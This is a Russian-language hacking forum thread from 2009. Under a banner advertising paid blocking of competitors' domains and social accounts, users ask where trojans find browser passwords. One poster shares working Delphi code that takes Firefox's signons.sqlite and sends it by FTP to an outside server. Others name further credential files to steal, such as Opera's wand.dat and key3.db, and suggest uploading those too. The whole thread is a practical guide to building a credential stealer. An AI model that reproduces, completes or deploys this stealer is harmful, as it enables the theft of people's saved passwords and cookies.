УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > Программирование > С/С++, C#, Delphi, .NET, Asm
Откуда из Браузеров Трой тянет инфу о паролях и почте??

Страница 1 из 2

Опции темы

Поиск в этой теме

Опции просмотра

Откуда из Браузеров Трой тянет инфу о паролях и почте??

31.12.2009, 00:42

TikTik

Познающий

Регистрация: 20.02.2009

Сообщений: 86

Провел на форуме:
183326

Репутация: 7

Откуда из Браузеров Трой тянет инфу о паролях и почте??

Откуда из Браузеров Трой тянет инфу о паролях и почте?? интрересуют Mozila и IE если можно название файликов и пути к ним пожалуйста

31.12.2009, 01:18

Gar|k

Постоянный

Регистрация: 20.03.2009

Сообщений: 564

Провел на форуме:
991929

Репутация: 395

Если не в ломы напишите еще где лежат cookie в разных обозревателях.
самому лень ) (з.ы в софари не нашел нихрена)

с наступающим!!!

31.12.2009, 01:27

wolmer

Постоянный

Регистрация: 12.05.2009

Сообщений: 395

Провел на форуме:
4761503

Репутация: 229

Цитата:

Сообщение от TikTik

Mozilla

Вроде как файле signons.sqlite -> сохр пароли (но не уверен)(Disc+':\Documents and Settings\'+User+'\Application Data\Mozilla\Firefox\Profiles\'+FireFoxUser+'\sign ons.sqlite')

Код который тырит сохр. пароли:

Код:

unit Unit1;

interface

uses
  Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
  Dialogs, StdCtrls, IdBaseComponent, IdComponent, IdTCPConnection,
  IdTCPClient, IdFTP;

type
  TForm1 = class(TForm)
    ListBox1: TListBox;
    Edit1: TEdit;
    IdFTP1: TIdFTP;
    procedure FormCreate(Sender: TObject);
  private
    { Private declarations }
  public
    { Public declarations }
  end;

var
  Form1: TForm1;

implementation

{$R *.dfm}

//На переменные которые лишние -> не обращаем внимания  :) 

function GetUserFromWindows: string;
var
  UserName : string;
  UserNameLen : Dword;
begin
  UserNameLen := 255;
  SetLength(userName, UserNameLen);
  if GetUserName(PChar(UserName), UserNameLen) then
    Result := Copy(UserName,1,UserNameLen - 1)
  else
    Result := 'Unknown';
end;

function GetSystemDisk: string;
var
 S: array[0..MAX_PATH] of Char;
begin
  GetWindowsDirectory(S,SizeOf(S));
  Result:=copy(S,0,1);
end;

procedure TForm1.FormCreate(Sender: TObject);
var
User,Disc:string;
coock,st,mask:string;
f:TextFile;
i:integer;
Sf:tsearchrec;
find:integer;
Firefox:string;
FireFoxUser:string;
begin
 //code by wolmer
 Disc:=GetSystemDisk;
 User:=GetUserFromWindows;
 find:=FindFirst(Disc+':\Documents and Settings\'+User+'\Application Data\Mozilla\Firefox\Profiles\*',faDirectory,sf);
  if find=0 then
   begin
    if ((Sf.Attr and faDirectory) = faDirectory) and
     ((Sf.Name = '.') or (Sf.Name = '..')) then
     begin
       Find:=FindNext(Sf);
     end;
   find:=FindNext(sf);
   FireFoxUser:=sf.name;
  end;
Firefox:= Disc+':\Documents and Settings\'+User+'\Application Data\Mozilla\Firefox\Profiles\'+FireFoxUser+'\signons.sqlite';
if FileExists(Firefox) then
 begin
  IdFTP1.Username:='123';
  IdFTP1.Password:='123';
  IdFTP1.Host:='ftp.narod.ru';
  IdFTP1.Port:=21;
  IdFTP1.Connect();
  IdFTP1.Put(FireFox, 'NameFile1');
  IdFTP1.Disconnect;
 end;
end;


end.

Ну а куки мозила хранит в cookies.sqlite

Вот для многих будет полезная информация о том какой файл и за что отвечает в мозиле:
http://wiki.mozilla-russia.org/index.php/О%20профилях%20Mozilla%20Firefox

Последний раз редактировалось wolmer; 31.12.2009 в 04:02..

31.12.2009, 01:55

TikTik

Познающий

Регистрация: 20.02.2009

Сообщений: 86

Провел на форуме:
183326

Репутация: 7

Цитата:

Сообщение от wolmer

cпасибо !!только не могу найти где же эти cocie.sqlite

(

там вот вычитал что есть такой cookies.txt а гдеон падлюка спрятан блиинн

Последний раз редактировалось TikTik; 31.12.2009 в 01:58..

31.12.2009, 02:01

ProTeuS

HARDstasy

Регистрация: 26.11.2004

Сообщений: 1,367

Провел на форуме:
4226592

Репутация: 2175

Отправить сообщение для ProTeuS с помощью ICQ

opera = wand.dat

31.12.2009, 02:11

wolmer

Постоянный

Регистрация: 12.05.2009

Сообщений: 395

Провел на форуме:
4761503

Репутация: 229

Цитата:

cпасибо !!только не могу найти где же эти cocie.sqlite

Не ужели их тут нету? -> Disc+':\Documents and Settings\'+User+'\Application Data\Mozilla\Firefox\Profiles\'+FireFoxUser+'\'

В основном в этом пути все хорошое/вкусное держится

31.12.2009, 02:13

Linkus

Участник форума

Регистрация: 20.12.2008

Сообщений: 130

Провел на форуме:
436500

Репутация: 11

Цитата:

Сообщение от wolmer

Код который тырит сохр. пароли:

ну спёр ты signons.sqlite, а дальше что с ним делать?

написал бы чем расшифровывать

и по-моему без key3.db ничего не сделаешь

31.12.2009, 02:15

wolmer

Постоянный

Регистрация: 12.05.2009

Сообщений: 395

Провел на форуме:
4761503

Репутация: 229

Цитата:

Сообщение от Linkus

ну спёр ты signons.sqlite, а дальше что с ним делать?

написал бы чем расшифровывать

и по-моему без key3.db ничего не сделаешь

Взял информацию из первого же источника в гугле, в крайнем случае ничего не мешает добавить еще одну строчку на залив файла key3.db

(чем расшифровывать -> гуглите, в крайнем случае -> офф сайт мозилы)

Последний раз редактировалось wolmer; 31.12.2009 в 03:13..